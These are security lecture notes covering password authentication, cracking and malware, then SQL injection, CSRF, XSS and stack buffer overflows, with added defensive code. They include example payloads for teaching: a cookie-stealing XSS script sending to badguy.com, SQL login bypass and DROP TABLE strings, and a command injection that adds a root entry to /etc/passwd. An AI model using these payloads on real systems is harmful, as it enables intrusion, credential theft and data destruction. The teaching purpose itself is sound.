1. PASSWORD ATTACK
2. APPLICATION ATTACK
References:
1. Bruce Schneier, Applied Cryptography
2. CEH v7 Tutorial
21/03/2017
Authentication
Authentication using One-Way Functions
Authentication using Public-Key Cryptography
Attack
Authentication
When Alice logs into a host computer, how does the host know who she is?
How does the host know she is not Eve trying to falsify Alice’s identity?
Traditionally, passwords solve this problem.
Both Alice and the host know this secret piece of knowledge, and the host requests it from Alice every time she tries to log in.
Authentication using One-Way Functions
The host does not need to know the passwords.
The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way functions.
Instead of storing passwords, the host stores one-way functions of the passwords.
1. Alice sends the host her password.
2. The host performs a one-way function on the password.
3. The host compares the result of the one-way function to the value it previously stored.
Since the host no longer stores a table of everybody’s valid password, the threat of someone breaking into the host and stealing the password list is mitigated.
The list of passwords operated on by the one-way function is useless, because the one-way function cannot be reversed to recover the passwords.
Authentication using Public-Key Cryptography
PROBLEM:
When Alice sends her password to her host, anyone who has access to her data path can read it.
Eve can be at any one of those points, listening to Alice’s login sequence. If Eve has access to the processor memory of the host, she can see the password before the host hashes it.
Public-key cryptography can solve this problem.
The host keeps a file of every user’s public key.
All users keep their own private keys.
When logging in, the protocol proceeds as follows:
• The host sends Alice a random string.
• Alice encrypts the string with her private key and sends it back to the host, along with her name.
• The host looks up Alice’s public key in its database and decrypts the message using that public key.
• If the decrypted string matches what the host sent Alice in the first place, the host allows Alice access to the system.
Secure proof-of-identity protocols take the following form:
• Alice performs a computation based on some random numbers and her private key and sends the result to the host.
• The host sends Alice a different random number.
• Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host.
• The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key.
• If she does, her identity is verified.
If Alice does not trust the host any more than the host trusts Alice, then Alice will require the host to prove its identity in the same manner.
Step (1) might seem unnecessary and confusing, but it is required to prevent attacks against the protocol.
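The four-step challenge-response login described above, as an added example that is not part of the slides. It uses textbook RSA with constructed, tiny keys purely to make the message flow visible; the key pair, the `secrets`-based challenge and the SHA-256 reduction are all assumptions, and a real system would use padded RSA from a proper library with full-size keys.

```python
# Added example (not from the slides): the host/Alice challenge-response
# protocol, with textbook RSA on constructed toy keys so the flow is visible.
import hashlib
import secrets

# Constructed toy key pair (assumption: real keys are >= 2048 bits and come
# from a library; these small primes exist only to keep the example readable).
P, Q = 1000003, 1000033
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent d = e^-1 mod phi(n)

ALICE_PRIVATE_KEY = (N, D)
HOST_PUBLIC_KEYS = {"alice": (N, E)}  # the host's file of every user's public key


def host_challenge() -> bytes:
    """Step 1: the host sends Alice a random string."""
    return secrets.token_bytes(16)


def sign_challenge(private_key, challenge: bytes) -> int:
    """Step 2: Alice 'encrypts' the string with her private key.
    The challenge is hashed and reduced mod n so it fits the toy modulus."""
    n, d = private_key
    m = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(m, d, n)


def host_verify(username: str, challenge: bytes, response: int) -> bool:
    """Steps 3-4: look up the user's public key, 'decrypt' the response with
    it, and compare against what the host sent in the first place."""
    key = HOST_PUBLIC_KEYS.get(username)
    if key is None:
        return False  # unknown user: nothing to verify against
    n, e = key
    expected = int.from_bytes(hashlib.sha256(challenge).digest(), "big") % n
    return pow(response, e, n) == expected


def login(username: str, private_key) -> bool:
    """One complete run of the protocol; True means access granted."""
    challenge = host_challenge()
    return host_verify(username, challenge, sign_challenge(private_key, challenge))
```

Only the holder of the matching private key produces a response the public key decrypts back to the challenge, and a response captured for one challenge is useless against the next, which is why the random string matters.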
Password Cracking Techniques
(a) Dictionary attack: based on familiar passwords
(b) Brute force attack: tries every combination of characters
(c) Hybrid attack: like a dictionary attack, but adds some numbers and symbols
(d) Syllable attack: combination of brute force attack and dictionary attack
(e) Rule-based attack: used when the attacker has some information about the password
A keylogger is a program that runs in the background and allows remote attackers to record every keystroke.
A Trojan enables attackers to get access to the passwords stored on the attacked computer.
Spyware is a type of malware that allows attackers to secretly gather information about a person or organization.
What does spyware do?
Steals the user’s personal information and sends it to a remote server
Monitors the user’s online activity
Displays annoying pop-ups and redirects the browser to advertising sites
Decreases the overall system security level
Connects to remote pornography sites
Reduces system performance and causes software instability
Purpose of a Trojan:
Steal information such as passwords, security codes and credit card information, using a keylogger
Delete or replace critical OS system files
Generate fake traffic to create a DoS attack
Disable firewall and antivirus
Use the victim’s PC for spamming
Use the victim’s PC as part of a botnet
A default password is a password supplied by the manufacturer with new equipment that is password protected.
Ex: www.defaultpassword.com
Windows stores user passwords in the Security Account Manager (SAM), not in clear text but hashed.
References:
1. Network Security. John Mitchell. Stanford University
2. CEH v7 Tutorial
Web security threat model: a web attacker sets up a malicious site that is visited by the victim (Alice) and has no control of the network between Alice and the system.
Network security threat model: a network attacker intercepts and controls the network communication between Alice and the system.
SQL Injection: the browser sends malicious input to the server; bad input checking fails to block the malicious SQL, which changes the meaning of the database command.
CSRF (cross-site request forgery): a bad web site sends a request to a good web site using the credentials of an innocent victim who “visits” the bad site, leveraging the user’s session at the victim server.
XSS (cross-site scripting): a bad web site sends an innocent victim a script that steals information from an honest web site, by injecting a malicious script into a trusted context.
Background for SQL Injection
Attack goal: execute arbitrary code on the server.
Example: code injection based on eval (PHP).
http://site.com/calc.php (server-side calculator):
    …
    $in = $_GET['exp'];
    eval('$ans = ' . $in . ';');
    …
Attack: http://site.com/calc.php?exp="10 ; system('rm *.*')" (URL encoded)
Example: PHP server-side code for sending email
    $email = $_POST["email"];
    $subject = $_POST["subject"];
    system("mail $email -s $subject < /tmp/joinmynetwork");
Attacker can post
    http://yourdomain.com/mail.php?subject=foo < /usr/passwd; ls
OR
    http://yourdomain.com/mail.php?[email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
Sample PHP (the wrong way):
    $recipient = $_POST['recipient'];
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executeQuery($sql);
Problem: what if ‘recipient’ is a malicious string that changes the meaning of the query?
(Figure: attacker, victim server, victim SQL DB. The attacker’s input becomes an unintended SQL query, and the attacker receives valuable data.)
CardSystems: a credit card payment processing company; SQL injection attack in June 2005; put out of business.
The attack: 263,000 credit card #s stolen from the database; credit card #s were stored unencrypted; 43 million credit card #s exposed.
WordPress SEO plugin by Yoast, March 2015
“The latest version at the time of writing (1.7.3.3) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities.”
“The authenticated Blind SQL Injection vulnerability can be found within the ‘admin/class-bulk-editor-list-table.php’ file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.”
https://wpvulndb.com/vulnerabilities/7841
    set ok = execute( "SELECT * FROM Users WHERE user=' " & form("user") & " ' AND pwd=' " & form("pwd") & " '" );
    if not ok.EOF
        login success
    else fail;
Is this exploitable?
(Figure: the web browser (client) sends “Enter Username & Password” to the web server, which queries the DB.)
Normal query:
    SELECT * FROM Users WHERE user='me' AND pwd='1234'
Suppose user = “ ' or 1=1 -- ” (URL encoded).
Then the script does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … )
The “--” causes the rest of the line to be ignored.
Now ok.EOF is always false and the login succeeds.
The bad news: easy login to many sites this way.
Suppose user = “ ' ; DROP TABLE Users -- ”
Then the script does: ok = execute( SELECT … WHERE user= ' ' ; DROP TABLE Users … )
This deletes the Users table.
Similarly: the attacker can add users, reset passwords, etc.
Suppose user = “ ' ; exec cmdshell 'net user badguy badpwd' / ADD -- ”
Then the script does: ok = execute( SELECT … WHERE username= ' ' ; exec … )
If the SQL server context runs as “sa”, the attacker gets an account on the DB server.
PHP: addslashes(“ ’ or 1=1 -- ”) outputs “ \’ or 1=1 -- ”
Unicode attack (GBK):
    0x5c      \
    0xbf27    ¿'
    0xbf5c    (a single valid two-byte GBK character)
    $user = 0xbf27
    addslashes($user) = 0xbf5c27
In GBK, 0xbf5c is one multibyte character, so the inserted backslash is absorbed into it and the quote 0x27 survives unescaped.
Correct implementation: mysql_real_escape_string()
Never build SQL commands yourself!
Use parameterized/prepared SQL
Use an ORM framework
Builds SQL queries by properly escaping args: ' becomes \'
Example: parameterized SQL (ASP.NET 1.1). Ensures SQL arguments are properly escaped.
    SqlCommand cmd = new SqlCommand(
        "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd",
        dbConnection);
    cmd.Parameters.Add("@User", Request["user"]);
    cmd.Parameters.Add("@Pwd", Request["pwd"]);
    cmd.ExecuteReader();
In PHP: bound parameters, a similar function.
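The login check from the slides built by string concatenation, next to the parameterized version, as an added example that is not from the slides. It uses an in-memory SQLite database with a constructed Users table and the slides’ own “ ' or 1=1 -- ” input; SQLite’s “--” comment syntax matches the one discussed above.

```python
# Added example (not from the slides): concatenated vs. parameterized login
# query, run against a constructed in-memory SQLite Users table.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user, 'me' with password '1234'."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    db.execute("INSERT INTO Users VALUES ('me', '1234')")
    return db


def login_concat(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """The wrong way: the untrusted values are spliced into the SQL text, so
    a quote in `user` ends the string literal and the rest becomes SQL."""
    sql = f"SELECT * FROM Users WHERE user='{user}' AND pwd='{pwd}'"
    return db.execute(sql).fetchone() is not None  # 'ok.EOF' check from the slides


def login_param(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Parameterized query: the same statement, but the values travel as data
    bound to the '?' placeholders and can never change the query's shape."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return db.execute(sql, (user, pwd)).fetchone() is not None


def users_table_exists(db: sqlite3.Connection) -> bool:
    """Helper to confirm the table survived; sqlite3.execute() refuses to run
    more than one statement, which is why the DROP TABLE payload from the
    slides is not demonstrated here."""
    row = db.execute("SELECT name FROM sqlite_master WHERE name='Users'").fetchone()
    return row is not None
```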
(Figure: CSRF, with an attack server, a server victim and a user victim.)
Q: how long do you stay logged in to Gmail? Facebook? …
Example:
User logs in to bank.com; the session cookie remains in browser state.
User visits another site containing:
    <form name=F action=http://bank.com/BillPay.php>
    <input name=recipient value=badguy> …
    <script> document.F.submit(); </script>
The browser sends the user’s auth cookie with the request, and the transaction will be fulfilled.
Problem: cookie auth is insufficient when side effects occur.
(Figure: the user credentials travel as Cookie: SessionID=523FA4cd2E.)
(Figure: bad web site, home router and user, steps 1 to 4.)
Fact: 50% of home users have a broadband router with a default or no password.
Drive-by Pharming attack: the user visits a malicious site; JavaScript at the site scans the home network looking for the broadband router:
• SOP allows “send only” messages
• Detect success using onerror:
    <IMG SRC=192.168.0.1 onError=do()>
Once found, log in to the router and change its DNS server.
Problem: “send-only” access is sufficient to reprogram the router.
[SRJ’07]
(Figure: the request carries referer: http://www.site.com.)
What if an honest site sends a POST to attacker.com?
Solution: the Origin header records the redirect.
Login CSRF: strict Referer/Origin header validation; login forms typically submit over HTTPS, so the header is not blocked.
HTTPS sites, such as banking sites: use strict Referer/Origin validation to prevent CSRF.
Other: use Ruby-on-Rails or another framework that implements the secret token method correctly.
Origin header: an alternative to Referer with fewer privacy problems; sent only on POST, sends only the necessary data; defense against redirect-based attacks.
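A strict Referer/Origin check for state-changing requests, as recommended in the table above, added here as an example that is not from the slides. The site origin, the header dictionaries and the choice to refuse requests with neither header are assumptions; bank.com plays the honest site from the earlier example.

```python
# Added example (not from the slides): strict Origin/Referer validation for
# side-effecting requests, with bank.com as the site being protected.
from typing import Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "http://bank.com"  # assumption: the honest site's own origin


def request_origin(headers: dict) -> Optional[str]:
    """Prefer Origin (sent on POST, carries only scheme and host). Fall back
    to Referer, reduced to its origin so no path or query is ever compared."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def allow_state_change(method: str, headers: dict) -> bool:
    """Strict validation: a POST/PUT/DELETE whose origin is missing or is not
    exactly SITE_ORIGIN is refused. Refusing on a missing header is the strict
    choice; it blocks some privacy-stripping clients but closes the gap where
    an attacker's page reaches the site through a redirect (Origin 'null' or
    a foreign Referer both fail the exact match)."""
    if method.upper() not in ("POST", "PUT", "DELETE"):
        return True  # safe methods must not have side effects in the first place
    return request_origin(headers) == SITE_ORIGIN
```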
(Figure: reflected XSS, with an attack server, a victim server and a victim client.)
Search field on victim.com:
    http://victim.com/search.php?term=apple
Server-side implementation of search.php (echoes the search term into the response):
    <HTML> <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET['term'] ?> :
    . . .
    </BODY> </HTML>
Consider the link (properly URL encoded):
    http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
What if the user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns
    <HTML> Results for <script> … </script>
3. Browser executes the script, which sends badguy.com the cookie for victim.com
    <html>
    Results for
    <script>
    window.open("http://attacker.com?" + ... document.cookie ...)
    </script>
    </html>
(Figure: the victim client requests http://victim.com/search.php?term=<script> ... </script> from www.victim.com; the injected script then contacts www.attacker.com.)
An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.
Methods for injecting malicious code:
Reflected XSS (“type 1”): the attack script is reflected back to the user as part of a page from the victim site.
Stored XSS (“type 2”): the attacker stores the malicious code in a resource managed by the web application, such as a database.
Others, such as DOM-based attacks.
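The search.php behaviour from the reflected-XSS example reproduced in Python, beside an output-encoded version, as an added example that is not from the slides. The page template, the link and the payload follow the slides; the function names and the use of the standard library’s html.escape are assumptions.

```python
# Added example (not from the slides): reflecting ?term= into the page as
# search.php does, versus HTML-encoding it first.
import html
from urllib.parse import parse_qs, quote, urlsplit

# The payload and link from the slides; quote() produces the "properly URL
# encoded" form a user would click on.
ATTACK_PAYLOAD = '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>'
ATTACK_LINK = "http://victim.com/search.php?term=" + quote(ATTACK_PAYLOAD)


def search_page(term: str, escape: bool) -> str:
    """Builds the response. escape=False echoes the term raw, exactly like
    `<?php echo $_GET['term'] ?>`; escape=True entity-encodes it first, so
    '<' becomes '&lt;' and the browser renders text instead of running code."""
    shown = html.escape(term, quote=True) if escape else term
    return ("<HTML> <TITLE> Search Results </TITLE>\n<BODY>\n"
            f"Results for {shown} :\n</BODY> </HTML>")


def handle_search_url(url: str, escape: bool) -> str:
    """Takes the full link, decodes the term= query parameter the way the
    server would, and renders the page."""
    query = parse_qs(urlsplit(url).query)
    term = query.get("term", [""])[0]
    return search_page(term, escape)


def has_live_script(page: str) -> bool:
    """True if the response still contains a real <script> tag the browser
    would execute (the check used by the tests)."""
    return "<script" in page.lower()
```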
(Figure: attack server, server victim and user victim.)
Email version:
Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website.
The injected code redirected PayPal visitors to a page warning users that their accounts had been compromised.
Victims were then redirected to a phishing site and prompted to enter sensitive financial data.
Source: http://www.acunetix.com/news/paypal.htm
SQL Injection: bad input checking allows a malicious SQL query. Known defenses address the problem effectively.
CSRF (cross-site request forgery): a forged request leveraging an ongoing session. Can be prevented (if XSS problems are fixed).
XSS (cross-site scripting): the problem stems from echoing untrusted input. Difficult to prevent; requires care, testing, tools, …
Other server vulnerabilities: increasing knowledge embedded in frameworks, tools and application development recommendations.
Ref
1. Professor Hossein Saiedian. KU Electrical Engineering and Computer Science.
“A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.”
A very common attack mechanism, from the 1988 Morris Worm to Code Red, Slammer, Sasser and many others.
Prevention techniques are known, but it is still of major concern due to the legacy of widely deployed buggy code and continued careless programming techniques.
Caused by a programming error: allows more data to be stored than the capacity available in a fixed-size buffer (the buffer can be on the stack, heap or global data), overwriting adjacent memory locations and leading to corruption of program data, unexpected transfer of control, memory access violation, or execution of code chosen by the attacker.
    #include <stdio.h>
    #include <string.h>

    #define FALSE 0
    #define TRUE  1

    /* Assumed helper (not shown on the slide): fills str1 with the expected
       tag "START", matching the first sample run below. */
    void next_tag(char *tag) { strcpy(tag, "START"); }

    int main(int argc, char *argv[]) {
        int valid = FALSE;
        char str1[8];
        char str2[8];
        next_tag(str1);
        gets(str2);   /* deliberately unsafe: reads with no bound on the input length */
        if (strncmp(str1, str2, 8) == 0)
            valid = TRUE;
        printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid);
        return 0;
    }
    $ cc -g -o buffer1 buffer1.c
    $ ./buffer1
    START
    buffer1: str1(START), str2(START), valid(1)
    $ ./buffer1
    EVILINPUTVALUE
    buffer1: str1(TVALUE), str2(EVILINPUTVALUE), valid(0)
    $ ./buffer1
    BADINPUTBADINPUT
    buffer1: str1(BADINPUT), str2(BADINPUTBADINPUT), valid(1)
Memory contents before and after gets(str2) for the BADINPUTBADINPUT run (hex word and its ASCII rendering in each column):

    Address    Before gets(str2)    After gets(str2)     Contains value of
    . . . .    . . . .              . . . .
    bffffbf4   34fcffbf  4 . . .    34fcffbf  3 . . .    argv
    bffffbf0   01000000  . . . .    01000000  . . . .    argc
    bffffbec   c6bd0340  . . . @    c6bd0340  . . . @    return addr
    bffffbe8   08fcffbf  . . . .    08fcffbf  . . . .    old base ptr
    bffffbe4   00000000  . . . .    01000000  . . . .    valid
    bffffbe0   80640140  . d . @    00640140  . d . @
    bffffbdc   54001540  T . . @    4e505554  N P U T    str1[4-7]
    bffffbd8   53544152  S T A R    42414449  B A D I    str1[0-3]
    bffffbd4   00850408  . . . .    4e505554  N P U T    str2[4-7]
    bffffbd0   30561540  0 V . @    42414449  B A D I    str2[0-3]
    . . . .    . . . .              . . . .
To exploit a buffer overflow an attacker must:
identify a buffer overflow vulnerability in some program (by inspection, tracing execution, or fuzzing tools)
understand how the buffer is stored in memory and determine the potential for corruption
At machine level all data is an array of bytes; its interpretation depends on the instructions used.
Modern high-level languages have a strong notion of type and valid operations and are not vulnerable to buffer overflows; this does incur overhead and some limits on use.
C and related languages have high-level control structures but allow direct access to memory, hence are vulnerable to buffer overflow; they have a large legacy of widely used, unsafe, and hence vulnerable code.
Stack frame:
Calling function: needs a data structure to store the “return” address and the parameters to be passed.
Called function: needs a place to store its local variables, somewhere different for every call.
A stack overflow occurs when the buffer is located on the stack; it was used by the Morris Worm, and the “Smashing the Stack” paper popularized it.
Local variables sit below the saved frame pointer and return address, hence overflow of a local buffer can potentially overwrite these key control items.
The attacker overwrites the return address with the address of the desired code: in the program, in a system library, or loaded in the buffer.
Buffer overflows are widely exploited: a large amount of vulnerable code is in use, despite the cause and countermeasures being known.
Two broad defense approaches: compile-time (harden new programs) and run-time (handle attacks on existing programs).
Use a modern high-level language with strong typing: not vulnerable to buffer overflow, since the compiler enforces range checks and permissible operations on variables. Such languages do have a cost in resource use and restrictions on access to hardware, so some code in C-like languages is still needed.
If using potentially unsafe languages (e.g. C), the programmer must explicitly write safe code: by design with new code, and with extensive after-the-fact code review of existing code (e.g. OpenBSD).
Buffer overflow safety is a subset of general safe coding techniques: allow for graceful failure (know how things may go wrong) and check for sufficient space in any buffer.
Proposals for safety extensions (library replacements) to C: performance penalties; programs must be compiled with a special compiler.
Several safer standard library variants: new functions, e.g. strlcpy(); safer re-implementation of standard functions as a dynamic library, e.g. Libsafe.
StackGuard: add function entry and exit code to check the stack for signs of corruption, using a random canary (e.g. StackGuard, Win/GS, GCC). Check for an overwrite between the local variables and the saved frame pointer and return address; abort the program if a change is found. Issues: recompilation, debugger support.
Or save and check a safe copy of the return address (in a safe, non-corruptible memory area), e.g. StackShield, RAD.
Many BO attacks copy machine code into the buffer and transfer control to it.
Use virtual memory support to make some regions of memory non-executable (to avoid execution of the attacker’s code), e.g. stack, heap, global data. Needs h/w support in the MMU; long existed on SPARC/Solaris systems; recent on x86 Linux/Unix/Windows systems. Issues: support for executable stack code.
Address space randomization: manipulate the location of key data structures (stack, heap, global data), changing the address by 1 MB using a random shift for each process; the large address range on modern systems means wasting some of it has negligible impact. Also randomize the location of heap buffers and the location of standard library functions.
Guard pages: place guard pages between critical regions of memory (or between stack frames), flagged in the MMU (memory management unit) as illegal addresses, so any access aborts the process. Can even be placed between stack frames and heap buffers, at an execution time and space cost.